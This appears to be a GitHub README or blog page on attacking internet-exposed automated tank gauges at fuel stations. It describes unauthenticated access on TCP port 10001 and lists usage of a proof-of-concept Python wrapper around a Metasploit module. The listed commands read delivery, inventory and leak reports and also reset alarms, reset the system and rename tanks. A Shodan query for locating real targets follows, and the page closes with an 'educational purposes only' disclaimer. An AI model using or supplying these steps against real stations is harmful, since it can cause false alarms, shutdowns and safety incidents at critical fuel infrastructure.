~/

How to Exploit ATG Gas Stations

Gas Station

Overview

Automated tank gauges (ATGs) are used to monitor fuel tank inventory levels, track deliveries, raise alarms that indicate problems with the tank or gauge (such as a fuel spill), and to perform leak tests in accordance with environmental regulatory compliance. ATGs are used by nearly every fueling station in the United States and tens of thousands of systems internationally.

Many ATGs can be programmed and monitored through a built-in serial port, a plug-in serial port, a fax/modem, or a TCP/IP circuit board. In order to monitor these systems remotely, many operators use a TCP/IP card or a third-party serial port server to map the ATG serial interface to an internet-facing TCP port. The most common configuration is to map these to TCP port 10001. Although some systems have the capability to password protect the serial interfaces, this is not commonly implemented.

Approximately 5,800 ATGs were found to be exposed to the internet without a password. Over 5,300 of these ATGs are located in the United States, which works out to about 3 percent of the approximately 150,000 fueling stations in the country.

An attacker with access to the serial port interface of an ATG may be able to shut down the station by spoofing the reported fuel level, generating false alarms, and locking the monitoring service out of the system. Tank gauge malfunctions are considered a serious issue due to the regulatory and safety issues that may apply.

PoC

Please note that the PoC is a simple Python wrapper for the Metasploit module that is already available.

Commands

- ALARM
- ALARM_RESET
- DELIVERY
- INVENTORY
- LEAK
- RELAY
- RESET
- CLEAR_RESET
- SENSOR
- SENSOR_DIAG
- SHIFT
- SET_TANK_NAME
- STATUS
- SYSTEM_STATUS
- TANK_ALARM
- TANK_DIAG
- VERSION

Get reports

.\poc.py -i IP -c DELIVERY
Delivery Report 
.\poc.py -i IP -c INVENTORY
Inventory Report 
.\poc.py -i IP -c LEAK

.\poc.py -i IP -c SHIFT
Shift Report 
.\poc.py -i IP -c STATUS

.\poc.py -i IP -c SYSTEM_STATUS
System Status

Get stats

.\poc.py -i IP -c RELAY
Relay Stats 
.\poc.py -i IP -c SENSOR

Get diagnostics

.\poc.py -i IP -c SENSOR_DIAG

.\poc.py -i IP -c TANK_DIAG

Get history

.\poc.py -i IP -c ALARM

.\poc.py -i IP -c TANK_ALARM

Make system changes (not recommended)

.\poc.py -i IP -c ALARM_RESET

.\poc.py -i IP -c CLEAR_RESET

.\poc.py -i IP -c RESET

.\poc.py -i IP -c SET_TANK_NAME

What is interesting to note is that there are also airports that are affected by this flaw.

Shodan

DIESEL "IN-TANK INVENTORY" "2025"
Shodan Results

The user is solely responsible for their actions and use of the program. For educational purposes only.

References